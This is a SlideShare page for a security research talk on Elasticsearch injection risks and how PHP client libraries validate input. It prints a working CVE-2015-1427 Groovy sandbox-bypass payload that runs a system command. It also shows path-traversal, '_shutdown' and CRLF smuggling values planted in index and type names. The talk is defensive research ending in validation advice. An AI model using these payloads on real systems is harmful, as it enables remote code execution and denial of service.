IW
Uploaded byIvan Wallarm
PDF, PPTX613 views

Dcm#8 elastic search

Elasticsearch is a distributed RESTful search engine that is potentially vulnerable to injection attacks if input is not validated properly. The document discusses previous security issues in Elasticsearch including remote code execution bugs, and analyzes the security of popular PHP Elasticsearch client libraries. It finds that the original Elasticsearch and Elastica clients encode URLs properly but Nervetattoo is potentially vulnerable if raw sockets are used without validation of index and type names passed to the client. Proper input validation is needed to prevent attacks through Elasticsearch clients.

Embed presentation

Download as PDF, PPTX
ElasticSearch: Is it secure? @d0znpp Wallarm research
What is ElasticSearch? “Elasticsearch is a distributed RESTful search engine built for the cloud.“ Official repo: https://github.com/elastic/elasticsearch Distributed Lucene instances broker ● RESTful API ● Native Java API Clients: https://www.elastic.co/guide/index.html
Previous works ● NoSQL Injection for Elasticsearch Kindle Edition by Gary Drocella http://goo.gl/OnfMOz => ACL to 9200 and 9300 ● NoSQL Injections: Moving Beyond 'or '1'='1'. Matt Bromiley Derbycon 2014 http://goo.gl/UBh42h => do not produce JSON by strings concatenation ● Securing ElasticSearch http://goo.gl/Ik3023 => Use Nginx to provide BasicAuth and other advices
Previous bugs: 5 CVE https://www.elastic.co/community/security ● CVE-2015-4165 is not disclosed yet ;( “All Elasticsearch versions from 1.0.0 to 1.5.2 are vulnerable to an attack that uses Elasticsearch to modify files read and executed by certain other applications.” ● CVE-2015-3337 path trav. https://goo.gl/YWwu3a ● CVE-2015-1427 Groovy RCE https://goo.gl/Bi9SfC ● CVE-2014-6439 CORS issue https://goo.gl/7kMxod ● CVE-2014-3120 Java RCE https://goo.gl/iZL5L8
Sandbox bypass 1427 { "size":1, "script_fields":{ "lupin":{ "script":"java.lang.Math.class.forName ("java.lang.Runtime").getRuntime().exec("id"). getText()" } } }
What is my point? BugBounty https://research.facebook.com/search?q=a%20 200 https://research.facebook.com/search?q=a%22 500 $1000 reward for injection into JSON to ElasticSearch But it might be RCE...
What is my point? ● Want to hack it through web-applications ● Because it’s really rare case when ES is present at network perimeter ● To check wrappers for different platforms for input validation attacks ● Yes, the same as with Memcached injections https: //goo.gl/9qV620 [BHUS-14]
4 popular clients (wrappers) http://jolicode.com/blog/elasticsearch-php-clients-test- drive ● Original (elasticsearch) ● Sherlock ● Elastica ● Nervetattoo Let’s start from PHP
● RESTful tricks (while user data at URL ../ et al.) ● JSON syntax breakers ( “ } { ] [ ) ● Native Java API ● Filename tricks (each index is a folder with the same name). I suggests that it is CVE-2015-4165 vector ;) Input validation kinds
● RESTful tricks (while user data at URL ../ et al.) ● JSON syntax breakers ( “ } { ] [ ) ● Native Java API <- Only about RESTful clients now ● Filename tricks (each index is a folder with the same name). I suggests that it is CVE-2015-4165 vector ;) <- ES internals, not clients Input validation kinds
● All URI parts goes through PHP urlencode(). But dot (0x2e) IS NOT encoded by RFC ● json_encode protects from injections into values $params = array(); $params['body'] = array('testField' => 'abc'); $params['index'] = '..'; $params['type'] = '_shutdown'; // Document will be indexed to my_index/my_type/<autogenerated_id> $ret = $client->index($params); elasticsearch original
● URI parts “as is” ● json_encode protects from injections into values $results = $es ->setIndex("what/../do/you/want!/") ->setType("and/../here/also!") ->search('title:cool&key=value&script_fields');//CVE nervetattoo
But it’s a raw socket, baby! $results = $es ->setIndex(" HTTP/1.1rn…”script”:”...”") // CVE ->setType("my_type") ->search('title:cool'); nervetattoo
● Use DSL methods ● Index name and type are not for users ● Do not concatenate strings to JSON ● Always filter data before putting into wrappers Conclusions
https://twitter.com/d0znpp blog.wallarm.com Thx!

More Related Content

PDF
Introduction to Elasticsearch
bySperasoft
 
PDF
Introduction to Elasticsearch
byJason Austin
 
PPTX
quick intro to elastic search
bymedcl
 
PDF
ElasticSearch - index server used as a document database
byRobert Lujo
 
PPTX
ElasticSearch AJUG 2013
byRoy Russo
 
PDF
Elastic Search
byLukas Vlcek
 
PPTX
ElasticSearch - DevNexus Atlanta - 2014
byRoy Russo
 
PDF
Simple search with elastic search
bymarkstory
 
Introduction to Elasticsearch
bySperasoft
 
Introduction to Elasticsearch
byJason Austin
 
quick intro to elastic search
bymedcl
 
ElasticSearch - index server used as a document database
byRobert Lujo
 
ElasticSearch AJUG 2013
byRoy Russo
 
Elastic Search
byLukas Vlcek
 
ElasticSearch - DevNexus Atlanta - 2014
byRoy Russo
 
Simple search with elastic search
bymarkstory
 

What's hot

PPTX
An Introduction to Elastic Search.
byJurriaan Persyn
 
ODP
Elasticsearch presentation 1
byMaruf Hassan
 
PDF
Null Bachaav - May 07 Attack Monitoring workshop.
byPrajal Kulkarni
 
PDF
Elasticsearch quick Intro (English)
byFederico Panini
 
ODP
Query DSL In Elasticsearch
byKnoldus Inc.
 
PPTX
Elasticsearch
byRicardo Peres
 
ODP
Elastic search
byNexThoughts Technologies
 
PPTX
Elasticsearch - under the hood
bySmartCat
 
ODP
Cool bonsai cool - an introduction to ElasticSearch
byclintongormley
 
PPTX
The ultimate guide for Elasticsearch plugins
byItamar
 
PPTX
Intro to elasticsearch
byJoey Wen
 
PPT
Elastic search apache_solr
bymacrochen
 
PDF
ElasticSearch in action
byCodemotion
 
PPTX
Elasticsearch - DevNexus 2015
byRoy Russo
 
PPTX
Philly PHP: April '17 Elastic Search Introduction by Aditya Bhamidpati
byRobert Calcavecchia
 
PDF
Practical Elasticsearch - real world use cases
byItamar
 
PDF
Elasticsearch: You know, for search! and more!
byPhilips Kokoh Prasetyo
 
PPTX
Solr vs. Elasticsearch - Case by Case
byAlexandre Rafalovitch
 
PPTX
Elastic Search
byNavule Rao
 
PDF
Elasticsearch for Data Analytics
byFelipe
 
An Introduction to Elastic Search.
byJurriaan Persyn
 
Elasticsearch presentation 1
byMaruf Hassan
 
Null Bachaav - May 07 Attack Monitoring workshop.
byPrajal Kulkarni
 
Elasticsearch quick Intro (English)
byFederico Panini
 
Query DSL In Elasticsearch
byKnoldus Inc.
 
Elasticsearch
byRicardo Peres
 
Elastic search
byNexThoughts Technologies
 
Elasticsearch - under the hood
bySmartCat
 
Cool bonsai cool - an introduction to ElasticSearch
byclintongormley
 
The ultimate guide for Elasticsearch plugins
byItamar
 
Intro to elasticsearch
byJoey Wen
 
Elastic search apache_solr
bymacrochen
 
ElasticSearch in action
byCodemotion
 
Elasticsearch - DevNexus 2015
byRoy Russo
 
Philly PHP: April '17 Elastic Search Introduction by Aditya Bhamidpati
byRobert Calcavecchia
 
Practical Elasticsearch - real world use cases
byItamar
 
Elasticsearch: You know, for search! and more!
byPhilips Kokoh Prasetyo
 
Solr vs. Elasticsearch - Case by Case
byAlexandre Rafalovitch
 
Elastic Search
byNavule Rao
 
Elasticsearch for Data Analytics
byFelipe
 

Similar to Dcm#8 elastic search

PPTX
Elasticsearch, Logstash, Kibana. Cool search, analytics, data mining and more...
byOleksiy Panchenko
 
ODP
Elasticsearch for beginners
byNeil Baker
 
PPT
Elk presentation1#3
byuzzal basak
 
PPTX
Иван Новиков «Elastic search»
byMail.ru Group
 
PPTX
Defcon Moscow #9 - Ivan Novikov "ElasticSearch is secure?"
byDefcon Moscow
 
PDF
Securing the Elastic Stack for free
byElasticsearch
 
PPTX
Introduction to Elasticsearch
byBo Andersen
 
PPTX
Elasticsearch
byDivij Sehgal
 
PDF
Hopper Elasticsearch Hackathon
byimotov
 
PPTX
ElasticSearch Meetup 30 - 10 - 2014
byAlberto Paro
 
PDF
Elasticsearch, a distributed search engine with real-time analytics
byTiziano Fagni
 
PPTX
Elastic pivorak
byPivorak MeetUp
 
PDF
Elasticsearch Architechture
byAnurag Sharma
 
PPTX
Elastic Meetup Belgium - December 2018
byArthur Eyckerman
 
PDF
Apache Lucene intro - Breizhcamp 2015
byAdrien Grand
 
PPTX
Elasticsearch for Autosuggest in Clojure at Workframe
byBrian Ballantine
 
PPTX
Elasticsearch workshop presentation
byLaura Steggles
 
PDF
Elasticsearch Quick Introduction
byimotov
 
PDF
The Elastic clients: Recent developments
byElasticsearch
 
PDF
Elasticsearch speed is key
byEnterprise Search Warsaw Meetup
 
Elasticsearch, Logstash, Kibana. Cool search, analytics, data mining and more...
byOleksiy Panchenko
 
Elasticsearch for beginners
byNeil Baker
 
Elk presentation1#3
byuzzal basak
 
Иван Новиков «Elastic search»
byMail.ru Group
 
Defcon Moscow #9 - Ivan Novikov "ElasticSearch is secure?"
byDefcon Moscow
 
Securing the Elastic Stack for free
byElasticsearch
 
Introduction to Elasticsearch
byBo Andersen
 
Elasticsearch
byDivij Sehgal
 
Hopper Elasticsearch Hackathon
byimotov
 
ElasticSearch Meetup 30 - 10 - 2014
byAlberto Paro
 
Elasticsearch, a distributed search engine with real-time analytics
byTiziano Fagni
 
Elastic pivorak
byPivorak MeetUp
 
Elasticsearch Architechture
byAnurag Sharma
 
Elastic Meetup Belgium - December 2018
byArthur Eyckerman
 
Apache Lucene intro - Breizhcamp 2015
byAdrien Grand
 
Elasticsearch for Autosuggest in Clojure at Workframe
byBrian Ballantine
 
Elasticsearch workshop presentation
byLaura Steggles
 
Elasticsearch Quick Introduction
byimotov
 
The Elastic clients: Recent developments
byElasticsearch
 
Elasticsearch speed is key
byEnterprise Search Warsaw Meetup
 

Recently uploaded

PDF
Guided Substation Engineering with CoMPAS: Simplifying IEC 61850
byDanBrown980551
 
PDF
Generative AI in UiPath: Mastering the Generative Extractor for Intelligent D...
byDianaGray10
 
PDF
Vibe Coding vs. Spec-Driven Development [Free Meetup]
byHaim Michael
 
PDF
ElyriaSoftware — Powering the Future with Blockchain Innovation
byElyria Software
 
PDF
Usage Control for Process Discovery through a Trusted Execution Environment
byValerioGoretti
 
PDF
DIGITAL FORENSICS - Notes for Everything.pdf
bypankajkumavatbeit
 
PPTX
The Landscape of Computer Software Development Companies
byYash Singh
 
PDF
API206-S: Transforming Supply Chains with Amazon Bedrock AgentCore - AWS re:I...
byChris Bingham
 
PDF
Knowing and Doing: Knowledge graphs, AI, and work
bymarainglezakis1
 
PDF
Empowering Productivity with Clever Prompts and Intelligent Agents
byUni Systems S.M.S.A.
 
PDF
TrustArc Webinar - Assessing AI Risk with Confidence
byTrustArc
 
PPTX
Ethics in AI - Artificial Intelligence Fundamentals.pptx
byemenyiblessing
 
PPTX
Ritesh_kumar_Aatmanirbhar Bharat: Make in India, Make for the World.pptx
byriteshrkgs2008
 
PDF
eResource Scheduler Enterprise Resource Management and Scheduling Software.pdf
byeResource Scheduler
 
PDF
Innovative AI Solutions for Business Growth.pdf
byVox Works
 
PPTX
The Future of IT Service Management AI Automation & Beyond.pptx
byChetu
 
PPTX
RISE with SAP for Automotive - S4 HANA Value.pptx
byAmira Jemi
 
PDF
Greetings All Students Update 3 by Mia Corp
by©LDMMIA, ©Reiki Yoga
 
PDF
Ransomware_Resilience_Strategic_Playbook.pdf
byAfonso Henrique Rodrigues Alves
 
PDF
AI Technology important knowledge ......
byutkarshj2007
 
Guided Substation Engineering with CoMPAS: Simplifying IEC 61850
byDanBrown980551
 
Generative AI in UiPath: Mastering the Generative Extractor for Intelligent D...
byDianaGray10
 
Vibe Coding vs. Spec-Driven Development [Free Meetup]
byHaim Michael
 
ElyriaSoftware — Powering the Future with Blockchain Innovation
byElyria Software
 
Usage Control for Process Discovery through a Trusted Execution Environment
byValerioGoretti
 
DIGITAL FORENSICS - Notes for Everything.pdf
bypankajkumavatbeit
 
The Landscape of Computer Software Development Companies
byYash Singh
 
API206-S: Transforming Supply Chains with Amazon Bedrock AgentCore - AWS re:I...
byChris Bingham
 
Knowing and Doing: Knowledge graphs, AI, and work
bymarainglezakis1
 
Empowering Productivity with Clever Prompts and Intelligent Agents
byUni Systems S.M.S.A.
 
TrustArc Webinar - Assessing AI Risk with Confidence
byTrustArc
 
Ethics in AI - Artificial Intelligence Fundamentals.pptx
byemenyiblessing
 
Ritesh_kumar_Aatmanirbhar Bharat: Make in India, Make for the World.pptx
byriteshrkgs2008
 
eResource Scheduler Enterprise Resource Management and Scheduling Software.pdf
byeResource Scheduler
 
Innovative AI Solutions for Business Growth.pdf
byVox Works
 
The Future of IT Service Management AI Automation & Beyond.pptx
byChetu
 
RISE with SAP for Automotive - S4 HANA Value.pptx
byAmira Jemi
 
Greetings All Students Update 3 by Mia Corp
by©LDMMIA, ©Reiki Yoga
 
Ransomware_Resilience_Strategic_Playbook.pdf
byAfonso Henrique Rodrigues Alves
 
AI Technology important knowledge ......
byutkarshj2007
 

Dcm#8 elastic search

  • 1.
  • 2.
    What is ElasticSearch? “Elasticsearchis a distributed RESTful search engine built for the cloud.“ Official repo: https://github.com/elastic/elasticsearch Distributed Lucene instances broker ● RESTful API ● Native Java API Clients: https://www.elastic.co/guide/index.html
  • 3.
    Previous works ● NoSQLInjection for Elasticsearch Kindle Edition by Gary Drocella http://goo.gl/OnfMOz => ACL to 9200 and 9300 ● NoSQL Injections: Moving Beyond 'or '1'='1'. Matt Bromiley Derbycon 2014 http://goo.gl/UBh42h => do not produce JSON by strings concatenation ● Securing ElasticSearch http://goo.gl/Ik3023 => Use Nginx to provide BasicAuth and other advices
  • 5.
    Previous bugs: 5CVE https://www.elastic.co/community/security ● CVE-2015-4165 is not disclosed yet ;( “All Elasticsearch versions from 1.0.0 to 1.5.2 are vulnerable to an attack that uses Elasticsearch to modify files read and executed by certain other applications.” ● CVE-2015-3337 path trav. https://goo.gl/YWwu3a ● CVE-2015-1427 Groovy RCE https://goo.gl/Bi9SfC ● CVE-2014-6439 CORS issue https://goo.gl/7kMxod ● CVE-2014-3120 Java RCE https://goo.gl/iZL5L8
  • 6.
    Sandbox bypass 1427 { "size":1, "script_fields":{ "lupin":{"script":"java.lang.Math.class.forName ("java.lang.Runtime").getRuntime().exec("id"). getText()" } } }
  • 7.
    What is mypoint? BugBounty https://research.facebook.com/search?q=a%20 200 https://research.facebook.com/search?q=a%22 500 $1000 reward for injection into JSON to ElasticSearch But it might be RCE...
  • 8.
    What is mypoint? ● Want to hack it through web-applications ● Because it’s really rare case when ES is present at network perimeter ● To check wrappers for different platforms for input validation attacks ● Yes, the same as with Memcached injections https: //goo.gl/9qV620 [BHUS-14]
  • 9.
    4 popular clients(wrappers) http://jolicode.com/blog/elasticsearch-php-clients-test- drive ● Original (elasticsearch) ● Sherlock ● Elastica ● Nervetattoo Let’s start from PHP
  • 10.
    ● RESTful tricks(while user data at URL ../ et al.) ● JSON syntax breakers ( “ } { ] [ ) ● Native Java API ● Filename tricks (each index is a folder with the same name). I suggests that it is CVE-2015-4165 vector ;) Input validation kinds
  • 11.
    ● RESTful tricks(while user data at URL ../ et al.) ● JSON syntax breakers ( “ } { ] [ ) ● Native Java API <- Only about RESTful clients now ● Filename tricks (each index is a folder with the same name). I suggests that it is CVE-2015-4165 vector ;) <- ES internals, not clients Input validation kinds
  • 12.
    ● All URIparts goes through PHP urlencode(). But dot (0x2e) IS NOT encoded by RFC ● json_encode protects from injections into values $params = array(); $params['body'] = array('testField' => 'abc'); $params['index'] = '..'; $params['type'] = '_shutdown'; // Document will be indexed to my_index/my_type/<autogenerated_id> $ret = $client->index($params); elasticsearch original
  • 13.
    ● URI parts“as is” ● json_encode protects from injections into values $results = $es ->setIndex("what/../do/you/want!/") ->setType("and/../here/also!") ->search('title:cool&key=value&script_fields');//CVE nervetattoo
  • 14.
    But it’s araw socket, baby! $results = $es ->setIndex(" HTTP/1.1rn…”script”:”...”") // CVE ->setType("my_type") ->search('title:cool'); nervetattoo
  • 15.
    ● Use DSLmethods ● Index name and type are not for users ● Do not concatenate strings to JSON ● Always filter data before putting into wrappers Conclusions
  • 16.